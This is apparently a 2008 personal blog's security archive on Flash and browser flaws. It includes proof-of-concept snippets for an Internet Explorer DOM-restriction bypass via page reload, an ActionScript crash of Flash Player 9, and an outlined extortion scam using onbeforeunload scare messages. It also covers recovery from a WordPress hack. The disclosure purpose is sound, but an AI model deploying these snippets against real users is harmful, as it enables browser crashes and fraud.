Bug in Internet Explorer security model when embedding Flash

Posted on September 10, 2008 by guya

Update: I’ve posted a real world example of this bug being exploited.

This one has the same behavior on IE6, IE7 and IE8 betas.

I have only tested this with Flash swf files, but it’s likely that this security is applied and broken the same way, when navigating to different types of files.

When loading Flash file (swf) directly inside the browser without an html page container, for ex: http://example.com/game.swf , most browsers create an html page automatically and embed the swf inside it. FireFox and Google Chrome, for that matter, automatically create an embed tag with some default values, and IE uses this mshtml script (res://mshtml.dll/objectembed_neutral.js) to load the object.

The fact that this automatically created embed tag doesn’t mention the allowscriptaccess property it’s defaulted to samedomain. This way the swf file can script the automatically generated html page it resides in, using ExternalInterface, leading to a major security flaw. I will post about a real world example of this security flaw, shortly.

Internet Explorer, rightfully, consider this generated page as less secure and as such restrict access to the JavaScript document object. It’s preventing from the embedded swf to script the DOM of the page.

Just test it, go to any swf file on the web using Internet explorer, then run this script in the address bar javascript:alert(document); you’ll see the error “Access is denied”. Touching the document is prohibited!

But, all that is needed to compromise this security feature in IE is to reload the page. That’s it, just reload the page once by pressing F5. Run the script again javascript:alert(document); you’ll see the precious document and no error will be thrown.

Since most of the other javascript objects are still available and among these is the window native object. A swf file, for example, can reload the page on its own using window.location.reload() and then will be able to bypass the restriction and freely manipulate the page.

This script can run from inside the swf using ExternaInterface.call(“eval”, “script”); If the “try” clause fail it’s probably an IE browser and the page will reload immediately without the user noticing. The 2nd time the page loads the “try” clause won’t fail.

try{
   $d = document;
   //Mess with the DOM
}catch(ex){
   window.location.reload();
}

I was impressed that Microsoft implemented such a security feature as opposed to FireFox, Chrome and others who don’t have a similar restriction. but, it needs to be done right otherwise it misses the point.

As I said, I’ll post a real world example of this being exploited, soon.

Police brutality against Flash

Posted on September 8, 2008 by guya

Update: You need to check the website to see what I’m talking about

The police (not the band) in general is a problematic institute. Giving average (and below) humans an excessive power and it’s likely that this power will get badly abused. I’ve always considered the Israeli police as somewhat average (average is relatively very good for a police).

Until I saw their pathetic attempt to create what they call the “Virtual Police Station“, created with the worst standards of the 90′s, this is clearly is a bad abuse of the Flash technology.

One should ask himself, until when will I stand aside and let these kind of things happen, when will I stand up and protest?!

Fat cop, thin cop (It stretches)

fat_cop_thin_cop

The police is not secure?!

police_security

Although the result is very bad, I must consider there’s might, only might be some users with a very low tech knowledge that might find this version of the website easier to understand. And for that doubt alone, and because I don’t want to be hunted by the police and spend the rest of my life behind bars. I’ll congrat them for the attempt to create something different

Mysteries Flash exploit is hijacking the clipboard?

Posted on August 17, 2008 by guya

Update: Adobe Product Security Incident Response Team (PSIRT) has referred to this “Clipboard attack”

Update 2: Aviv Raff has updated me about the fact that it won’t be that easy to replicate this attack using Javascript on the latest browsers and with the default security settings. Thanx.

Lately there were some rumors about a mysteries Flash exploit that is hijacking the users clipboard and will always fill it with a URL to some malicious website, no matter what you’ll copy to the clipboard it’ll will always paste the same URL. This malicious website will ask you to download a fake anti-virus. It’s also been mentioned in some places that in order to clear this behavior you’ll have to restart your machine.

But is it really an exploit, a bug in the Flash player that let the attacker demolish the users clipboard until restart?! From what I’ve seen so far it’s not an exploit and no restart is needed, it’s just a bad use of a Flash and JavaScript feature. Both of these allow a valid script to write text to the user’s clipboard. I’m surprised that only now this questionable feature is starting to get abused. The abusing code is probably residing in some Flash AD, in one of the user tabs and consistently rewriting the clipboard.

Although this attack can be done using simple JavaScript, Flash it the right vessel for this kind of attacks. I think that, encapsulating attacks inside RIA code, mainly Flash and SilverLight, is just starting to gain attention and will become a major security issue. I have some other examples which I attend to write about soon.

My blog has been hacked

Posted on June 16, 2008 by guya

The first part of an hacker’s job would be to gather some information about her target, server, technology and software that runs on the desired target. With Worpress all is needed is viewing the html source to see the “<meta>” tag that describes what version of WordPress is currently running and how vulnerable it is. Attackers scan/google this automatically along with other parameters to see what blogs they likely want to hack.

I have always saw the updates in the Worpress dashboard and always stupidly ignored it, thinking, who would want to hack my blog?! I should have known that a PR of 7 is very appealing to the spammers. But even if you don’t have any PR or have very low traffic it doesn’t mean that you’re safe from being hacked and it’s been reported that very new and unpopular blogs has been hacked as well.

The attackers have managed to use an old exploit in my blog, a very old one, and polluted my blog with thousands of spamming pages, all hidden in some obscure folders. One of the first things I’ve noticed was some strange traffic is going into my blog, mostly from unrelated blogs which showed no indication of linking to me. Only when looking inside their HTML source I saw its hidden links to me. I’ve realized that I’m part of a zombie network of hacked blogs and splogs all for the sake of generating spam money. I’ve informed some websites that they were probably hacked as well, and I still found new websites that have hidden links to my blog and probably been controlled as part of this spammer network. This is an indication that the attackers work is far from perfect and probably not fully automatic, as they still don’t know I’m out of it, and still link to me.

Servers these days have become (relatively) very secure, securing it has become mostly a plug and play, you plug your firewall, you plug your security software suit and your almost done. (I don’t wanna disregard any IT and their hard work, but you get the point). Attacks vectors needed to be changed into exploiting the developer’s code and the end user, as these are the most error prone areas these days. As such, it became the developers responsibility to not only write a compiling code but also write a secure code. As for the users, they still shouldn’t be expected much and allowed to be very dumb. Its not sure yet if developers can be expected to always produce a safe code, WordPress is created by highly talented developers and still all of it’s security flaws were due to insecure coding. I’ve heard this being compared with an old development problem, which is, producing optimized code, that problem was never completely solved. Currently developers don’t have sufficient tools and resource to overcome these problems. One can only hope that in the same way that viruses has lost their strength over the years this will be the same for these kind of attacks. We can only wonder what will be the next generation of attackers, maybe the end users will become the only reasonable target.

The first lesson here is to always upgrade your blog. Although this can be tiring process, with updates coming all the time, it is must be done. The WordPress update process itself is very easy and fast and I really encourage you to do it the minute a new version is available. You might want to be assisted by this auto upgrade plug-in.

What is described here is mostly about the WordPress blog platform but this is far from being the only massively used and attacked open-source web application.

Finally I would like to try and coin a new phrase. The same way we were introduced by the developer who can also be a designer named – Devinger. I think it time to introduce the Safeloper. The Safeloper is a developer that has the tools and knowledge to produce secure programs.

I guess we should always expect to be hacked and always backup.

How to find out if you’ve been hacked:

As opposed to old school Internet hacking, where the attacker main goal was to make a name for herself and that the attack would be known and published. In this new kind of hacking the attackers main goal is to make money through spam, and as such their last intention is that the owner of the hacked website will have any clue that she’s been compromised. You might get weird increase or decrease in traffic and the google PR might drop a bit, but, you won’t see anything completely different unless you’ll look for it.

Simple as that, view source and search for spam words like cars, montage, pharmaceutical, etc’.

look at traffic to your blog – If you see some strangely unrelated blogs linking to you there is a good chance you’ve been hacked and used as a splog. Go to the suspect blog and view its source for hidden spam links to you.

Look at the google search traffic to your blog – The latest exploit, also known as the anyresult.net hack, is a way to steal google result of your blog. Clean all cookies, search yourself in google, if a link to your blog is redirecting to another web-site then you’ve been hacked. Clean your cookie again and do this a few times to be sure.

Make Sure Your WordPress is Not Hacked – some more info.

What to do if you’ve been hacked

I would suggest to backup everything from your blog including all the file folders and database and then do a fresh install of the new WordPress (Currently 2.5.1). To backup the folders use an FTP client, the DB backup is generally done from the website’s control panel or from the WP admin. Only after the fresh install, start adding all the customized stuff like themes and plug-ins checking each and every one as you add it, you should even check the images. When it comes to the plug-ins your better off re-downloading it.

Change your blog password and all of the blog registered users passwords, make sure all the users are valid and not some hacker created. It’s better not to use WP for user registration as this is a source for a lot of the previous exploits.

How to prevent your blog from future hacks

Always install updates – It’s fast and easy

Remove the Generator Meta tag – WP shows its version number inside the HTML. If existed it’ll help the hacker to know how vulnerable you are.

Put empty index.html files inside the WP pligins folder and any other folder that don’t have an index file. it won’t stop anyone, but, will give the attacker a harder time understanding the structure of your blog and what plug-ins you have installed.

Monitor your files for changes or use some kind of script firewalls

Install only trusted plug-ins

More Resources:

Did your WordPress site get hacked? – More info about the structure of the Wrdpress attacks and how to prevent them, written by one of the WordPress people.

Patching the WordPress AnyResults.Net Hack – Describes how to fix the latest WordPress exploit, which is found on WP 2.5 or earlier, it was fixed on WP 2.5.1 but, updated blogs aren’t automatically fixed if it were already exploited. This exploit redirect search engine results of your website to anyresult.net. More, more and more.

File change notifications for your WordPress blog on Linux – A good explanation on how to monitor files changes on your blog. This way you’ll know when a hacker have managed to change or add files. The problem with it, is that it’s recommended not to monitor the cache folder, because it’s constantly being written by WordPress. Hackers are also aware that this folder is difficult to monitor and it’s where they put their malicious files.

Firewallscript WordPress Firewall – Commercial (85$) firewall that runs on the php script level without the need of installing it on the server itself, and hence good for shared hosting. It’ll monitor files for changes and more.

Munin A PHP application firewall – The same as above just free and open-source.

WordPress exploit: we been hit by hidden spam link injection – More information on how to deal with hidden spam link injection

Won’t publish posts anymore – A less common hack that prevent you from publishing into your own blog.

How to Protect Your WordPress Site

9 easy ways to secure your WordPress blog

10 Ways to Secure your WordPress Install

Almost Perfect htaccess File for WordPress Blogs

When Patches are the Problem – Apparently automatic security updates isn’t a perfect solution either.

Security through visibility: The secrets of open source security – WordPress is open source, is it really make it less secure?

XP SP3 downgrade the Flash Player

Posted on June 3, 2008 by guya

Update: Apparently SP3 doesn’t downgrade the player. It’ll only install an older version 9.0.115 if you don’t have the latest 9.0.124 already installed, according to this blog post from Ryan Stewart. More info here.

The latest Windows XP service pack 3 comes bundled with the old 8.0.24.0 version of the Flash player. This version, beside not being able to play back some of the latest web content, has some major security flaw, along with a weaker security model and some other bugs.

If you apply this update to your windows system, make sure you install the latest Flash player from here.

Security flaws in FLA files

Posted on March 20, 2008 by guya

FLA is one of these file format that we’re used to freely open without any fear. Our complete confidence is going to change since a new exploit has been found. This exploit enable an attacker to manipulate an FLA file in a way that, when loaded into the Flash CS3 or 8 IDE, it will execute arbitrary code on our machine.

No need to panic, it’s unlikely that too many of the malicious FLA files are floating around. Just don’t run any untrusted FLA files until Adobe will issue the fix.

More info

Technical info

Social Engineering Exploits using Flash

Posted on January 27, 2008 by guya

Apparently Adobe has fixed the bug I’ve found that enables a swf file to crash the browser, with the last version of the Flash Player (9,0,115,0). I don’t know if it’s related to my post, but, anyway it’s good that it’s been fixed.

Since it’s already fixed, I just want to give an example of how this could have been exploited with a little Social Engineering. This example might look stupid to you and you would have never fall for it but remember, first, it’s only an idea, the real attacker might be more creative, second, some Internet users are far from savvy and might fall for crazier stuff then this.

In this example, the naive user will reach a web site with this text: “I’ve installed a virus on your windows machine and now have full control of it and your FireFox browser. You have exactly 1:00 minute to donate 10$ to my account, click here to donate. If you fail to donate in the appropriate time I will disable your browser for a few minutes. This will be your first and last warning. Afterwards you have exactly 10 minutes to return to this page and complete your donation or your system and personal data will be compromised and damaged permanently. The only way you can remove the virus from your machine is to donate from this page”.

The details like OS and browser will be interchangeable with the real user spec. The user will see the 1:00 minute timer counting, when it’ll reach 0:00, boom! the browser crashes using the Flash bug, if the user try to close the browser or the tab, Javascript’s onbeforeunload can be used to crash the browser and also add some scary alert.

[js]window.onbeforeunload = function()
{
//flash.kill();
return “If you leave this page without donating your system will be lost!!!”;
}[/js]

Some of the users will have enough fear in them to return and donate to the attackers PayPal account. Sound crazy?! Some have been known to fall for crazier phishing tricks. I personally know a few. Take care of the dummies near you.

Too much focus will kill you

Posted on July 8, 2007 by guya

I’ve just came across of a way to kill the Flash player with a few lines of AS 2.0. I know of at least one other way of killing the Flash player along with it’s host, may it be the browser or the Flash IDE, but this was with the old 7th player, this time we’re talking about the latest 9th version. It’s a little awkward, and don’t ask me how I got it, but, it involves a MovieClip, a TextField, Selection, Macromedia’s Delegate, a filter, and a trace, yeah, it won’t work without a call to trace. I think the main trouble maker is the Selection.onSetFocus, but, I couldn’t recreate it without any of the above ingredients, and I have a feeling that AS2′s trace is also problematic in Flash Player 9. (You should anyway “Omit trace actions”, from the settings, when publishing swfs)

Focus Kills

I haven’t tried it, but, I doubt that it can be recreated with AS3 on the VM2, it’s the VM1 that we have to carry along for backward compatibility that causes all this trouble. I tested it on some different machines with different Flash players and so far it crushed them all, here is the list:

Copy this code into an empty FLA first frame, or download the source below to see how it goes.

var mc:MovieClip = this.createEmptyMovieClip("mc", 0);

var tf:TextField = this.createTextField("tf", 1, 20, 20, 300, 100);
tf.type = "input";
tf.border = true;
tf.text = "Flash Player Varsion: " + System.capabilities.version + "nDebug Player: " + System.capabilities.isDebugger + "nOperating System: " + System.capabilities.os + "nnClick here or press the TAB key to kill Flash";

tf.onSetFocus = mx.utils.Delegate.create(this, glow);

Selection.addListener(this);

function onSetFocus(oldf:Object, newf:Object):Void{
Selection.setFocus(oldf);
}

function glow(){
mc.filters = [new flash.filters.BevelFilter()]; // any filter except BitmapFilter()
trace(mc.filters);
}

Download source files.

Try it (Warnning!!!, it may crash your browser)

Valve was hacked again

Posted on April 19, 2007 by guya

Valve, the maker of two of the best games of all time, Half-Life 2 and 1, was already hacked once in 2003. The source code of it’s highly anticipated and in-development game, Half-Life 2, was stolen and was then available for everyone on the web. Playable version started to emerge, and the company had to postpone the release for months, which cost them a lot of money and pain. You might have thought that they learned from the experience, but it seems that they might have been hacked again. This time no source code for you to peek in “only” sensitive data like users credit card numbers was stolen.

GUYA.NET

Flash and Everything Else

Category Archives: Security